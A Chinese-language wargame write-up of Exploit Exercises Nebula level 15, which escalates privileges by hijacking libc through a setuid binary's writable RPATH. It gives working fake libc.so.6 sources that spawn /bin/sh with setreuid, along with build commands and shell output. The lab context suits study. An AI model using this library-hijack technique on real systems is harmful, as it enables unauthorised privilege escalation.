动态链接库劫持--libc
动态链接库劫持--libc
1 概述
动态链接库劫持,本文是做这个题目的笔记:Exploit Exercises - Nebula 15。
2 Exploit Exercises - Nebula 15
2.1 问题描述
根据题目的要求,我们需要用strace命令观察flag15的系统调用情况。
最终目标是通过这个程序拿到flag。
整个过程都是在调用一个叫libc.so.6的动态链接库:
level15@nebula:/home/flag15$ strace ./flag15 execve("./flag15", ["./flag15"], [/* 16 vars */]) = 0 brk(0) = 0x99ef000 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb78c3000 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) open("/var/tmp/flag15/tls/i686/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory) stat64("/var/tmp/flag15/tls/i686/sse2/cmov", 0xbfc05494) = -1 ENOENT (No such file or directory) open("/var/tmp/flag15/tls/i686/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory) stat64("/var/tmp/flag15/tls/i686/sse2", 0xbfc05494) = -1 ENOENT (No such file or directory) open("/var/tmp/flag15/tls/i686/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory) stat64("/var/tmp/flag15/tls/i686/cmov", 0xbfc05494) = -1 ENOENT (No such file or directory) open("/var/tmp/flag15/tls/i686/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory) stat64("/var/tmp/flag15/tls/i686", 0xbfc05494) = -1 ENOENT (No such file or directory) open("/var/tmp/flag15/tls/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory) stat64("/var/tmp/flag15/tls/sse2/cmov", 0xbfc05494) = -1 ENOENT (No such file or directory) open("/var/tmp/flag15/tls/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory) stat64("/var/tmp/flag15/tls/sse2", 0xbfc05494) = -1 ENOENT (No such file or directory) open("/var/tmp/flag15/tls/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory) stat64("/var/tmp/flag15/tls/cmov", 0xbfc05494) = -1 ENOENT (No such file or directory) open("/var/tmp/flag15/tls/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory) stat64("/var/tmp/flag15/tls", 0xbfc05494) = -1 ENOENT (No such file or directory) open("/var/tmp/flag15/i686/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory) stat64("/var/tmp/flag15/i686/sse2/cmov", 0xbfc05494) = -1 ENOENT (No such file or directory) open("/var/tmp/flag15/i686/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory) stat64("/var/tmp/flag15/i686/sse2", 0xbfc05494) = -1 ENOENT (No such file or directory) open("/var/tmp/flag15/i686/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory) stat64("/var/tmp/flag15/i686/cmov", 0xbfc05494) = -1 ENOENT (No such file or directory) open("/var/tmp/flag15/i686/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory) stat64("/var/tmp/flag15/i686", 0xbfc05494) = -1 ENOENT (No such file or directory) open("/var/tmp/flag15/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory) stat64("/var/tmp/flag15/sse2/cmov", 0xbfc05494) = -1 ENOENT (No such file or directory) open("/var/tmp/flag15/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory) stat64("/var/tmp/flag15/sse2", 0xbfc05494) = -1 ENOENT (No such file or directory) open("/var/tmp/flag15/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory) stat64("/var/tmp/flag15/cmov", 0xbfc05494) = -1 ENOENT (No such file or directory) open("/var/tmp/flag15/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory) stat64("/var/tmp/flag15", {st_mode=S_IFDIR|0775, st_size=100, ...}) = 0 open("/etc/ld.so.cache", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=33815, ...}) = 0 mmap2(NULL, 33815, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb78ba000 close(3) = 0 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory) open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\222\1\0004\0\0\0"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=1544392, ...}) = 0 mmap2(NULL, 1554968, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x4fe000 mmap2(0x674000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x176) = 0x674000 mmap2(0x677000, 10776, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x677000 close(3) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb78b9000 set_thread_area({entry_number:-1 -> 6, base_addr:0xb78b98d0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 mprotect(0x674000, 8192, PROT_READ) = 0 mprotect(0x8049000, 4096, PROT_READ) = 0 mprotect(0xe86000, 4096, PROT_READ) = 0 munmap(0xb78ba000, 33815) = 0 fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb78c2000 write(1, "strace it!\n", 11strace it! ) = 11 exit_group(11) = ? level15@nebula:/home/flag15$ |
2.2 思路
主要思路:
1. 生成libc.so.6
2. 劫持程序的导入函数或者利用_init函数
__libc_start_main
__gmon_start__
Puts
3. 劫持函数中可以执行system(“/bin/sh”)
4. System函数可以来自系统的libc.so.6,这需要静态链接libgcc;
5. System函数也可以是自定义实现的
为了实现目标,首先要知道SO的路径名称、导入表中有哪些信息
查看Dynamic section
可以看到名称为libc.so.6,路径为/var/tmp/flag15
level15@nebula:/home/flag15$ readelf -d ./flag15
Dynamic section at offset 0xf20 contains 21 entries: Tag Type Name/Value 0x00000001 (NEEDED) Shared library: [libc.so.6] 0x0000000f (RPATH) Library rpath: [/var/tmp/flag15] 0x0000000c (INIT) 0x80482c0 |
查看重定位表
可以看到导入了3个函数:puts、__gmon_start__、__libc_start_main;
level15@nebula:/var/tmp/flag15$ readelf -r /home/flag15/flag15
Relocation section '.rel.dyn' at offset 0x2a0 contains 1 entries: Offset Info Type Sym.Value Sym. Name 08049ff0 00000206 R_386_GLOB_DAT 00000000 __gmon_start__
Relocation section '.rel.plt' at offset 0x2a8 contains 3 entries: Offset Info Type Sym.Value Sym. Name 0804a000 00000107 R_386_JUMP_SLOT 00000000 puts 0804a004 00000207 R_386_JUMP_SLOT 00000000 __gmon_start__ 0804a008 00000307 R_386_JUMP_SLOT 00000000 __libc_start_main |
查看版本信息
level15@nebula:/home/flag15$ readelf -V ./flag15
Version symbols section '.gnu.version' contains 5 entries: Addr: 0000000008048276 Offset: 0x000276 Link: 5 (.dynsym) 000: 0 (*local*) 2 (GLIBC_2.0) 0 (*local*) 2 (GLIBC_2.0) 004: 1 (*global*)
Version needs section '.gnu.version_r' contains 1 entries: Addr: 0x0000000008048280 Offset: 0x000280 Link: 6 (.dynstr) 000000: Version: 1 File: libc.so.6 Cnt: 1 0x0010: Name: GLIBC_2.0 Flags: none Version: 2 |
2.3 劫持__libc_start_main
参考https://mike-boya.github.io/blog/2016/02/22/exploit-exercises-nebula-level15/
Dummy_libc.c
#include
int __libc_start_main(int (*main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) { system("/bin/sh"); return 0; } |
Version.ld
GLIBC_2.0 { }; |
Makefile
build: gcc -shared -static-libgcc -fPIC -Wl,--version-script=version.ld,-Bstatic dummy_libc.c -o libc.so.6 |
l -static:链接静态库文件
l -static-libgcc:链接libgcc静态库
-shared-libgcc:链接libgcc共享库
构建共享库和可执行程序时,默认为链接libgcc共享库
l gcc使用-Wl传递连接器参数
l ld使用-Bdynamic强制链接动态库,-Bstatic强制链接静态库。
l ld使用--version-script指定版本脚本
l 注意:静态链接libgcc必须配合使用-static-libgcc和-Wl,-Bstatic
结果
level15@nebula:/home/flag15$ ./flag15 sh-4.2$ id uid=1016(level15) gid=1016(level15) euid=984(flag15) groups=984(flag15),1016(level15) sh-4.2$ getflag You have successfully executed getflag on a target account sh-4.2$ exit exit Segmentation fault |
2.4 劫持puts
修改Dummy_libc.c
int puts(const char *s) { system("/bin/sh"); return 0; } |
结果
level15@nebula:/home/flag15$ ./flag15 ./flag15: relocation error: ./flag15: symbol __libc_start_main, version GLIBC_2.0 not defined in file libc.so.6 with link time reference |
注意:puts的执行在__libc_start_main之后;所以还要实现__libc_start_main。
继续修改dummy_libc.c
#include
int __libc_start_main(int (*main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) { main(argc, ubp_av, 0); return 0; }
int puts(const char *s) { system("/bin/sh"); return 0; } |
结果
level15@nebula:/home/flag15$ ./flag15 sh-4.2$ id uid=1016(level15) gid=1016(level15) euid=984(flag15) groups=984(flag15),1016(level15) sh-4.2$ getflag You have successfully executed getflag on a target account sh-4.2$ exit exit Segmentation fault |
2.5 劫持__gmon_start__
修改dummy_libc.c
void __gmon_start__(void) { system("/bin/sh"); } |
执行结果:
level15@nebula:/home/flag15$ ./flag15 sh-4.2$ id uid=1016(level15) gid=1016(level15) euid=984(flag15) groups=984(flag15),1016(level15) sh-4.2$ getflag You have successfully executed getflag on a target account sh-4.2$ exit exit ./flag15: relocation error: ./flag15: symbol __libc_start_main, version GLIBC_2.0 not defined in file libc.so.6 with link time reference |
注意:__gmon_start在__libc_start_main之前执行;
因此执行完毕后又报告没有找到__libc_start_main;
2.6 使用自定义system函数
之前使用的都是libc中的system函数,我们假冒的libc静态链接了系统的libc库。
这里不使用系统的libc库。
大小上可以看出来:
-rwxrwxr-x 1 level15 level15 779369 2018-04-02 18:56 libc.b*
-rwxrwxr-x 1 level15 level15 5545 2018-04-04 00:13 libc.so.6*
Libc.b是静态链接系统libc的库;
Libc.so.6是不使用系统libc的版本;
不使用系统的libc库时,覆盖__gmon_start__函数就没有用了。
Dummy_libc.c
#define __NR_execve 11 #define __NR_geteuid32 201 #define __NR_setreuid32 203
long system(const char *command) { long ret; asm volatile ("int $0x80" : "=a" (ret) : "a" (__NR_execve), "b"(command), "c"(0), "d" (0) ); return ret; }
int geteuid() { long ret; asm volatile ("int $0x80" : "=a" (ret) : "a" (__NR_geteuid32) ); return ret; }
int setreuid(int ruid, int euid) { long ret; asm volatile ("int $0x80" : "=a" (ret) : "a" (__NR_setreuid32), "b"(ruid), "c"(euid) ); return ret; }
void getshell(void) { int euid;
euid = geteuid(); setreuid(euid, euid); system("/bin/sh"); }
int __libc_start_main(int (*main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) { getshell(); return 0; } |
Version.ld
GLIBC_2.0 { }; GLIBC_2.1.3 { }; |
Makefile
build: gcc -shared -nostdlib -nostdinc -Wl,--version-script=version.ld dummy_libc.c -o libc.so.6 |
结果
level15@nebula:/home/flag15$ ./flag15 flag15@nebula:/home/flag15$ id uid=984(flag15) gid=1016(level15) groups=984(flag15),1016(level15) flag15@nebula:/home/flag15$ getflag You have successfully executed getflag on a target account flag15@nebula:/home/flag15$ exit exit |
注意:
l 如果不使用setreuid,则得到的是普通的shell,ruid和euid不会修改为文件的所有者;
l GCC内联汇编和-fPIC/-fpic选项有冲突。原因是位置无关代码使用了GOT表,而EBX指向GOT表。因而-fPIC/-fpic编译时,GCC内联汇编中不允许使用EBX。
level15@nebula:/var/tmp/flag15$ gcc -shared -nostdlib -nostdinc -fPIC -fpic -Wl,--version-script=version.ld dummy_libc.c -o libc.so.6
dummy_libc.c: In function ‘system’:
dummy_libc.c:8:5: error: inconsistent operand constraints in an ‘asm’
2.7 利用_init函数
so在被加载之前,会执行init段的代码。在结束的时候,会执行fini段的代码。
下面是使用自定义system函数重写_init函数的代码(其它文件见上节):
#define __NR_execve 11 #define __NR_geteuid32 201 #define __NR_setreuid32 203
long system(const char *command) { long ret; asm volatile ("int $0x80" : "=a" (ret) : "a" (__NR_execve), "b"(command), "c"(0), "d" (0) ); return ret; }
int geteuid() { long ret; asm volatile ("int $0x80" : "=a" (ret) : "a" (__NR_geteuid32) ); return ret; }
int setreuid(int ruid, int euid) { long ret; asm volatile ("int $0x80" : "=a" (ret) : "a" (__NR_setreuid32), "b"(ruid), "c"(euid) ); return ret; }
void getshell(void) { int euid;
euid = geteuid(); setreuid(euid, euid); system("/bin/sh"); }
//void __attribute__((constructor)) init() void _init() { getshell(); } |
当然,也可以使用libc的system函数:
#include
void __attribute__((constructor)) init() { system("/bin/sh"); } |
level15@nebula:/var/tmp/flag15$ cat makefile build: gcc -shared -static-libgcc -fPIC -Wl,--version-script=version.ld,-Bstatic dummy_libc.c -o libc.so.6 |
2.8 测试中的问题
2.8.1 no version information available
【现象】
dummy_libc.c
#include
int __libc_start_main(int (*main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) { system("/bin/sh"); return 0; } |
首先,这样生成共享库是不行的:
level15@nebula:/var/tmp/flag15$ gcc -shared -fPIC dummy_libc.c -o libc.so.6 |
报错如下:
level15@nebula:/home/flag15$ ./flag15 ./flag15: /var/tmp/flag15/libc.so.6: no version information available (required by ./flag15) ./flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6) ./flag15: /var/tmp/flag15/libc.so.6: no version information available (required by /var/tmp/flag15/libc.so.6) ./flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol __cxa_finalize, version GLIBC_2.1.3 not defined in file libc.so.6 with link time reference |
【原因】
no version information available (required by ./flag15)
原因:程序运行时链接的共享库的版本和程序构建时链接的共享库的版本不匹配。
这个例子中,构建时libc版本号为2.0,运行时为2.13
(PS:高版本为什么不支持低版本?)
查看构建时的动态库版本号
level15@nebula:/home/flag15$ readelf -V ./flag15
Version symbols section '.gnu.version' contains 5 entries: Addr: 0000000008048276 Offset: 0x000276 Link: 5 (.dynsym) 000: 0 (*local*) 2 (GLIBC_2.0) 0 (*local*) 2 (GLIBC_2.0) 004: 1 (*global*)
Version needs section '.gnu.version_r' contains 1 entries: Addr: 0x0000000008048280 Offset: 0x000280 Link: 6 (.dynstr) 000000: Version: 1 File: libc.so.6 Cnt: 1 0x0010: Name: GLIBC_2.0 Flags: none Version: 2 |
查看运行时的动态库版本号
level15@nebula:/home/flag15$ /lib/i386-linux-gnu/libc.so.6 GNU C Library (Ubuntu EGLIBC 2.13-20ubuntu5) stable release version 2.13, by Roland McGrath et al. |
level15@nebula:/home/flag15$ ldd --version ldd (Ubuntu EGLIBC 2.13-20ubuntu5) 2.13 |
现在给链接器传递版本信息
level15@nebula:/var/tmp/flag15$ cat version.ld GLIBC_2.0 { }; level15@nebula:/var/tmp/flag15$ gcc -shared -fPIC -Wl,--version-script=version.ld dummy_libc.c -o libc.so.6 |
运行结果如下:
level15@nebula:/home/flag15$ ./flag15 ./flag15: /var/tmp/flag15/libc.so.6: version `GLIBC_2.1.3' not found (required by /var/tmp/flag15/libc.so.6) |
2.8.2 version `GLIBC_2.1.3' not found
疑问:这个问题和no version information available的区别?
原因:GLIBC版本不匹配
查看版本信息:
.gnu.version中没有2.1.3
.gnu.version_r中有2.1.3
.gnu.version_d中没有2.1.3
level15@nebula:/home/flag15$ readelf -V /var/tmp/flag15/libc.so.6
Version symbols section '.gnu.version' contains 12 entries: Addr: 00000000000002c8 Offset: 0x0002c8 Link: 3 (.dynsym) 000: 0 (*local*) 3 (GLIBC_2.1.3) 4 (GLIBC_2.0) 0 (*local*) 004: 0 (*local*) 1 (*global*) 1 (*global*) 2 (GLIBC_2.0) 008: 1 (*global*) 1 (*global*) 1 (*global*) 1 (*global*)
Version definition section '.gnu.version_d' contains 2 entries: Addr: 0x00000000000002e0 Offset: 0x0002e0 Link: 4 (.dynstr) 000000: Rev: 1 Flags: BASE Index: 1 Cnt: 1 Name: libc.so.6 0x001c: Rev: 1 Flags: WEAK Index: 2 Cnt: 1 Name: GLIBC_2.0
Version needs section '.gnu.version_r' contains 1 entries: Addr: 0x0000000000000318 Offset: 0x000318 Link: 4 (.dynstr) 000000: Version: 1 File: libc.so.6 Cnt: 2 0x0010: Name: GLIBC_2.0 Flags: none Version: 4 0x0020: Name: GLIBC_2.1.3 Flags: none Version: 3 |
修改
level15@nebula:/var/tmp/flag15$ cat version.ld GLIBC_2.0 { }; GLIBC_2.1.3 { }; |
level15@nebula:/var/tmp/flag15$ gcc -shared -fPIC -Wl,--version-script=version.ld dummy_libc.c -o libc.so.6 |
现在3个节中都有版本信息了:
level15@nebula:/home/flag15$ readelf -V /var/tmp/flag15/libc.so.6
Version symbols section '.gnu.version' contains 13 entries: Addr: 00000000000002dc Offset: 0x0002dc Link: 3 (.dynsym) 000: 0 (*local*) 4 (GLIBC_2.1.3) 5 (GLIBC_2.0) 0 (*local*) 004: 0 (*local*) 1 (*global*) 1 (*global*) 2 (GLIBC_2.0) 008: 1 (*global*) 1 (*global*) 1 (*global*) 3 (GLIBC_2.1.3) 00c: 1 (*global*)
Version definition section '.gnu.version_d' contains 3 entries: Addr: 0x00000000000002f8 Offset: 0x0002f8 Link: 4 (.dynstr) 000000: Rev: 1 Flags: BASE Index: 1 Cnt: 1 Name: libc.so.6 0x001c: Rev: 1 Flags: WEAK Index: 2 Cnt: 1 Name: GLIBC_2.0 0x0038: Rev: 1 Flags: WEAK Index: 3 Cnt: 1 Name: GLIBC_2.1.3
Version needs section '.gnu.version_r' contains 1 entries: Addr: 0x000000000000034c Offset: 0x00034c Link: 4 (.dynstr) 000000: Version: 1 File: libc.so.6 Cnt: 2 0x0010: Name: GLIBC_2.0 Flags: none Version: 5 0x0020: Name: GLIBC_2.1.3 Flags: none Version: 4 |
但是仍然出错了
level15@nebula:/home/flag15$ ./flag15 ./flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol __cxa_finalize, version GLIBC_2.1.3 not defined in file libc.so.6 with link time reference |
2.8.3 symbol __cxa_finalize not defined
疑问:/var/tmp/flag15/libc.so.6动态链接了/lib/i386-linux-gnu/libc.so.6,为什么还有上面的版本问题,为什么还有符号找不到呢?
level15@nebula:/var/tmp/flag15$ ldd ./libc.so.6 linux-gate.so.1 => (0x00212000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00908000) /lib/ld-linux.so.2 (0x00f9c000) |
level15@nebula:/var/tmp/flag15$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep __cxa_finalize 1945: 00032c80 319 FUNC GLOBAL DEFAULT 12 __cxa_finalize@@GLIBC_2.1.3 level15@nebula:/var/tmp/flag15$ readelf -s ./libc.so.6 | grep __cxa_finalize 1: 00000000 0 FUNC WEAK DEFAULT UND __cxa_finalize@GLIBC_2.1.3 (4) 48: 00000000 0 FUNC WEAK DEFAULT UND __cxa_finalize@@GLIBC_2.1 |
定义__cxa_finalize(dummy_libc.c中增加以下定义)
void __cxa_finalize(void) { return; } |
仍然报错
level15@nebula:/home/flag15$ ./flag15 ./flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol system, version GLIBC_2.0 not defined in file libc.so.6 with link time reference |
2.8.4 symbol system not defined
如果使用-nostdlib选项
gcc -shared -nostdlib -fPIC -Wl,--version-script=version.ld dummy_libc.c -o libc.so.6
则出错如下:
level15@nebula:/home/flag15$ ./flag15
./flag15: symbol lookup error: /var/tmp/flag15/libc.so.6: undefined symbol: system
dummy_libc.c
//#include
void __cxa_finalize(void) { return; }
extern long system(const char *command); #if 0 long system(const char *command) { long ret; asm volatile ("int $0x80" : "=a" (ret) : "a" (11), "b"(command), "c"(0), "d" (0) : "memory"); return ret; } #endif
int __libc_start_main(int (*main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) { system("/bin/sh"); return 0; } |
System.c
long system(const char *command) { long ret; asm volatile ("int $0x80" : "=a" (ret) : "a" (11), "b"(command), "c"(0), "d" (0) : "memory"); return ret; } |
Makefile
build: gcc system.c -c -o system.o gcc -shared -nostdlib -fPIC -Wl,--version-script=version.ld dummy_libc.c system.o -o libc.so.6 |
但是运行结果是这样的:
(PS:原因时没有setreuid)
level15@nebula:/home/flag15$ ./flag15 bash-4.2$ id uid=1016(level15) gid=1016(level15) groups=1016(level15) bash-4.2$ getflag getflag is executing on a non-flag account, this doesn't count bash-4.2$ exit |
3 结论
l 劫持libc的主要过程:
1. 生成libc.so.6
2. 劫持程序的导入函数或者利用_init函数
__libc_start_main
__gmon_start__
3. 劫持函数中可以执行system(“/bin/sh”)
4. System函数可以来自系统的libc.so.6,这需要静态链接libgcc;
5. System函数也可以是自定义实现的
l 自定义system函数需要使用setreuid,否则得到的是普通的shell
l GCC系统调用内联汇编和-fPIC/-fpic选项有冲突。原因是位置无关代码使用了GOT表,而EBX指向GOT表。因而-fPIC/-fpic编译时,GCC内联汇编中不允许使用EBX。
解决方法是要么不使用-fPIC/-fpic,要么将内联汇编独立到单独的文件,单独编译;
5 参考资料
1. https://exploit-exercises.com/nebula/level01/。
2. Version Script。https://ftp.gnu.org/old-gnu/Manuals/ld-2.9.1/html_node/ld_25.html
3. Command Line Options。https://ftp.gnu.org/old-gnu/Manuals/ld-2.9.1/html_node/ld_3.html
4. EXPLOIT EXERCISES NEBULA LEVEL15。https://mike-boya.github.io/blog/2016/02/22/exploit-exercises-nebula-level15/。
5. https://github.com/1u4nx/Exploit-Exercises-Nebula/blob/master/Level15——动态链接库劫持.org